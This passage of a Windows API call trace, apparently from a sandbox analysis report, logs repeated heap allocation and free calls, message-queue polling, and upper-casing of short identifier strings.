lpMsg=0x8bf3c0) returned 0 [0165.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.743] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0165.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0165.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.744] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0165.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0165.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0165.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0165.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0165.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0165.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.745] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0165.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0165.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0165.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0165.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0165.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.745] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0165.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0165.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0165.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0165.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0165.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0165.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0165.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0165.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0165.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.747] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.747] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0165.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0165.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.747] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0165.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.748] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0165.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.748] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.748] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0165.749] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0165.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0165.749] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0165.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0165.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.749] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.750] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.750] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0165.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0165.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0165.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0165.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.752] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.752] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.752] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0165.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0165.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0165.753] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0165.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.753] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0165.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.754] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.754] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) 